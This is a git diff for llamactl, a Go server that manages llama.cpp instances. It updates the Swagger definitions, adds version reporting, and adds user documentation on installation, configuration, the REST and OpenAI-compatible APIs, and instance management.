-       "llamactl.OpenAIListInstancesResponse": {
+       "server.OpenAIListInstancesResponse": {
            "type": "object",
            "properties": {
                "data": {
                    "type": "array",
                    "items": {
-                       "$ref": "#/definitions/llamactl.OpenAIInstance"
+                       "$ref": "#/definitions/server.OpenAIInstance"
                    }
                },
                "object": {


@@ -1,6 +1,6 @@
 basePath: /api/v1
 definitions:
-  llamactl.CreateInstanceOptions:
+  instance.CreateInstanceOptions:
    properties:
      alias:
        type: string
@@ -66,7 +66,6 @@ definitions:
      device_draft:
        type: string
      draft_max:
-        description: Speculative decoding params
        type: integer
      draft_min:
        type: integer
@@ -137,6 +136,9 @@ definitions:
        type: string
      host:
        type: string
+      idle_timeout:
+        description: Idle timeout
+        type: integer
      ignore_eos:
        type: boolean
      jinja:
@@ -203,7 +205,7 @@ definitions:
      no_cont_batching:
        type: boolean
      no_context_shift:
-        description: Server/Example-specific params
+        description: Example-specific params
        type: boolean
      no_escape:
        type: boolean
@@ -227,6 +229,9 @@ definitions:
        type: boolean
      numa:
        type: string
+      on_demand_start:
+        description: On demand start
+        type: boolean
      override_kv:
        items:
          type: string
@@ -251,9 +256,9 @@ definitions:
        type: integer
      presence_penalty:
        type: number
-      priority:
+      prio:
        type: integer
-      priority_batch:
+      prio_batch:
        type: integer
      props:
        type: boolean
@@ -267,8 +272,7 @@ definitions:
        type: number
      reranking:
        type: boolean
-      restart_delay_seconds:
-        description: RestartDelay duration in seconds
+      restart_delay:
        type: integer
      rope_freq_base:
        type: number
@@ -301,7 +305,7 @@ definitions:
        type: string
      ssl_key_file:
        type: string
-      temperature:
+      temp:
        type: number
      tensor_split:
        type: string
@@ -345,18 +349,29 @@ definitions:
      yarn_orig_ctx:
        type: integer
    type: object
-  llamactl.Instance:
+  instance.InstanceStatus:
+    enum:
+    - 0
+    - 1
+    - 2
+    type: integer
+    x-enum-varnames:
+    - Stopped
+    - Running
+    - Failed
+  instance.Process:
    properties:
      created:
        description: Creation time
        type: integer
      name:
        type: string
-      running:
+      status:
+        allOf:
+        - $ref: '#/definitions/instance.InstanceStatus'
        description: Status
-        type: boolean
    type: object
-  llamactl.OpenAIInstance:
+  server.OpenAIInstance:
    properties:
      created:
        type: integer
@@ -367,11 +382,11 @@ definitions:
      owned_by:
        type: string
    type: object
-  llamactl.OpenAIListInstancesResponse:
+  server.OpenAIListInstancesResponse:
    properties:
      data:
        items:
-          $ref: '#/definitions/llamactl.OpenAIInstance'
+          $ref: '#/definitions/server.OpenAIInstance'
        type: array
      object:
        type: string
@@ -393,7 +408,7 @@ paths:
          description: List of instances
          schema:
            items:
-              $ref: '#/definitions/llamactl.Instance'
+              $ref: '#/definitions/instance.Process'
            type: array
        "500":
          description: Internal Server Error
@@ -441,7 +456,7 @@ paths:
        "200":
          description: Instance details
          schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
        "400":
          description: Invalid name format
          schema:
@@ -470,12 +485,12 @@ paths:
        name: options
        required: true
        schema:
-          $ref: '#/definitions/llamactl.CreateInstanceOptions'
+          $ref: '#/definitions/instance.CreateInstanceOptions'
      responses:
        "201":
          description: Created instance details
          schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
        "400":
          description: Invalid request body
          schema:
@@ -504,12 +519,12 @@ paths:
        name: options
        required: true
        schema:
-          $ref: '#/definitions/llamactl.CreateInstanceOptions'
+          $ref: '#/definitions/instance.CreateInstanceOptions'
      responses:
        "200":
          description: Updated instance details
          schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
        "400":
          description: Invalid name format
          schema:
@@ -627,7 +642,7 @@ paths:
        "200":
          description: Restarted instance details
          schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
        "400":
          description: Invalid name format
          schema:
@@ -654,7 +669,7 @@ paths:
        "200":
          description: Started instance details
          schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
        "400":
          description: Invalid name format
          schema:
@@ -681,7 +696,7 @@ paths:
        "200":
          description: Stopped instance details
          schema:
-            $ref: '#/definitions/llamactl.Instance'
+            $ref: '#/definitions/instance.Process'
        "400":
          description: Invalid name format
          schema:
@@ -777,7 +792,7 @@ paths:
        "200":
          description: List of OpenAI-compatible instances
          schema:
-            $ref: '#/definitions/llamactl.OpenAIListInstancesResponse'
+            $ref: '#/definitions/server.OpenAIListInstancesResponse'
        "500":
          description: Internal Server Error
          schema:
@@ -787,4 +802,21 @@ paths:
      summary: List instances in OpenAI-compatible format
      tags:
      - openai
+  /version:
+    get:
+      description: Returns the version of the llamactl command
+      responses:
+        "200":
+          description: Version information
+          schema:
+            type: string
+        "500":
+          description: Internal Server Error
+          schema:
+            type: string
+      security:
+      - ApiKeyAuth: []
+      summary: Get llamactl version
+      tags:
+      - version
 swagger: "2.0"


@@ -11,6 +11,11 @@ import (
 	"syscall"
 )
+// version is set at build time using -ldflags "-X main.version=1.0.0"
+var version string = "unknown"
+var commitHash string = "unknown"
+var buildTime string = "unknown"
 // @title llamactl API
 // @version 1.0
 // @description llamactl is a control server for managing Llama Server instances.
@@ -19,6 +24,14 @@ import (
 // @basePath /api/v1
 func main() {
+	// --version flag to print the version
+	if len(os.Args) > 1 && os.Args[1] == "--version" {
+		fmt.Printf("llamactl version: %s\n", version)
+		fmt.Printf("Commit hash: %s\n", commitHash)
+		fmt.Printf("Build time: %s\n", buildTime)
+		return
+	}
 	configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
 	cfg, err := config.LoadConfig(configPath)
 	if err != nil {
@@ -26,6 +39,11 @@ func main() {
 		fmt.Println("Using default configuration.")
 	}
+	// Set version information
+	cfg.Version = version
+	cfg.CommitHash = commitHash
+	cfg.BuildTime = buildTime
 	// Create the data directory if it doesn't exist
 	if cfg.Instances.AutoCreateDirs {
 		if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
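The three version variables above are ordinary `package main` strings, so a release build can inject real values through the linker. A minimal sketch of such a build command (the `git` and `date` invocations are illustrative assumptions, not taken from this repository's release scripts):

```bash
# Hypothetical release build: inject version metadata via -ldflags
VERSION=$(git describe --tags --always)
COMMIT=$(git rev-parse --short HEAD)
BUILD_TIME=$(date -u +%Y-%m-%dT%H:%M:%SZ)

go build \
  -ldflags "-X main.version=${VERSION} -X main.commitHash=${COMMIT} -X main.buildTime=${BUILD_TIME}" \
  -o llamactl ./cmd/server
```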

4
docs-requirements.txt Normal file

@@ -0,0 +1,4 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4


@@ -0,0 +1,150 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
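For example, a value from a config file in the current directory is overridden by the matching environment variable. A small sketch (file contents and values are illustrative):

```bash
# llamactl.yaml in the current directory sets the port...
cat > llamactl.yaml <<'EOF'
server:
  port: 8080
EOF

# ...but the environment variable takes precedence, so the server binds to 9090
LLAMACTL_PORT=9090 llamactl
```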
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
  host: "0.0.0.0" # Server host to bind to
  port: 8080 # Server port to bind to
  allowed_origins: ["*"] # Allowed CORS origins (default: all)
  enable_swagger: false # Enable Swagger UI for API docs
instances:
  port_range: [8000, 9000] # Port range for instances
  data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
  configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
  logs_dir: ~/.local/share/llamactl/logs # Logs directory
  auto_create_dirs: true # Auto-create data/config/logs dirs if missing
  max_instances: -1 # Max instances (-1 = unlimited)
  max_running_instances: -1 # Max running instances (-1 = unlimited)
  enable_lru_eviction: true # Enable LRU eviction for idle instances
  llama_executable: llama-server # Path to llama-server executable
  default_auto_restart: true # Auto-restart new instances by default
  default_max_restarts: 3 # Max restarts for new instances
  default_restart_delay: 5 # Restart delay (seconds) for new instances
  default_on_demand_start: true # Default on-demand start setting
  on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
  timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
  require_inference_auth: true # Require auth for inference endpoints
  inference_keys: [] # Keys for inference endpoints
  require_management_auth: true # Require auth for management endpoints
  management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the config file path with the `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
  host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
  port: 8080 # Server port to bind to (default: 8080)
  allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
  enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Instance Configuration
```yaml
instances:
  port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
  data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
  configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
  logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
  auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
  max_instances: -1 # Maximum instances (-1 = unlimited)
  max_running_instances: -1 # Maximum running instances (-1 = unlimited)
  enable_lru_eviction: true # Enable LRU eviction for idle instances
  llama_executable: "llama-server" # Path to llama-server executable
  default_auto_restart: true # Default auto-restart setting
  default_max_restarts: 3 # Default maximum restart attempts
  default_restart_delay: 5 # Default restart delay in seconds
  default_on_demand_start: true # Default on-demand start setting
  on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
  timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
  require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
  inference_keys: [] # List of valid inference API keys
  require_management_auth: true # Require API key for management endpoints (default: true)
  management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.


@@ -0,0 +1,70 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
**Quick install methods:**
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
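Based on the `--version` handling in `cmd/server/main.go`, the output looks like the following; the exact values depend on how your binary was built (a binary built without linker flags reports `unknown`):

```
llamactl version: v1.0.0
Commit hash: abc1234
Build time: 2025-09-03T21:00:00Z
```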
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!


@@ -0,0 +1,143 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Log in with the management API key. By default, one is generated during server startup; copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Model Path**: Path to your Llama.cpp model file
- **Additional Options**: Any extra Llama.cpp parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configuration
Here's a basic example configuration for a Llama 2 model:
```json
{
  "name": "llama2-7b",
  "model_path": "/path/to/llama-2-7b-chat.gguf",
  "options": {
    "threads": 4,
    "context_size": 2048
  }
}
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/v1/instances

# Create a new instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
  -H "Content-Type: application/json" \
  -d '{"model_path": "/path/to/model.gguf"}'

# Start an instance
curl -X POST http://localhost:8080/api/v1/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "my-model",
    "messages": [
      {
        "role": "user",
        "content": "Hello! Can you help me write a Python function?"
      }
    ],
    "max_tokens": 150,
    "temperature": 0.7
  }'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI

# Point the client to your Llamactl server
client = OpenAI(
    base_url="http://localhost:8080/v1",
    api_key="your-inference-api-key"  # Required when inference auth is enabled (the default)
)

# Create a chat completion
response = client.chat.completions.create(
    model="my-model",  # Use the name of your instance
    messages=[
        {"role": "user", "content": "Explain quantum computing in simple terms"}
    ],
    max_tokens=200,
    temperature=0.7
)

print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Learn more about instance management in [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown. (new image, 69 KiB)

BIN docs/images/dashboard.png Normal file

Binary file not shown. (new image, 44 KiB)

41
docs/index.md Normal file

@@ -0,0 +1,41 @@
# Llamactl Documentation
Welcome to the Llamactl documentation! **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
Llamactl is designed to simplify the deployment and management of llama-server instances. It provides a modern solution for running multiple large language models with centralized management.
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

docs/user-guide/api-reference.md (new file, 412 lines)

@@ -0,0 +1,412 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
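In practice the two key types map to the two endpoint families; a sketch, assuming one key of each type has been configured:
```bash
# Management key: instance operations under /api/v1
curl -H "Authorization: Bearer your-management-key" \
  http://localhost:8080/api/v1/instances

# Inference key: OpenAI-compatible endpoints under /v1
curl -H "Authorization: Bearer your-inference-key" \
  http://localhost:8080/v1/models
```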
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "starting",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopping",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "restarting",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of log lines to return (defaults to all; `-1` also returns all lines)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings, Rerank
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
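The non-chat endpoints take the same routing field; a minimal sketch of a `/v1/completions` request body for the instance above:
```json
{
  "model": "llama2-7b",
  "prompt": "The capital of France is",
  "max_tokens": 10
}
```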
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing model name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/models/llama-2-7b.gguf"
    }
  }'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

docs/user-guide/managing-instances.md (new file, 190 lines)

@@ -0,0 +1,190 @@
# Managing Instances
Learn how to effectively manage your Llama.cpp instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. Configure model source (choose one):
- **Model Path**: Full path to your downloaded GGUF model file
- **HuggingFace Repo**: Repository name (e.g., `unsloth/gemma-3-27b-it-GGUF`)
- **HuggingFace File**: Specific file within the repo (optional, uses default if not specified)
4. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
5. Configure optional llama-server backend options:
- **Threads**: Number of CPU threads to use
- **Context Size**: Context window size (ctx_size)
- **GPU Layers**: Number of layers to offload to GPU
- **Port**: Network port (auto-assigned by llamactl if not specified)
- **Additional Parameters**: Any other llama-server command line options (see [llama-server documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/server/README.md))
6. Click **"Create"** to save the instance
### Via API
```bash
# Create instance with local model file
curl -X POST http://localhost:8080/api/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096
}
}'
# Create instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
},
"auto_restart": true,
"max_restarts": 3
}'
```
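The instance management settings described above for the Web UI are plain top-level fields in the same request body; a sketch combining them (values are illustrative):
```bash
# Create an instance that starts on demand and stops after 30 idle minutes
curl -X POST http://localhost:8080/api/instances/on-demand-model \
  -H "Content-Type: application/json" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "hf_repo": "unsloth/gemma-3-27b-it-GGUF"
    },
    "on_demand_start": true,
    "idle_timeout": 30
  }'
```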
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status badge switch to "Unknown" while the instance starts
3. Monitor startup progress in the logs
4. The badge changes to "Ready" once the instance is up
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
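To apply changes, you can also restart through the API; a minimal sketch following the same path convention as the start and stop endpoints:
```bash
curl -X POST http://localhost:8080/api/instances/{name}/restart
```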
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Fetch instance logs:
```bash
# Get instance logs
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying llama-server instances.
```bash
# Proxy a request to the underlying llama-server instance
curl http://localhost:8080/api/instances/{name}/proxy/
```
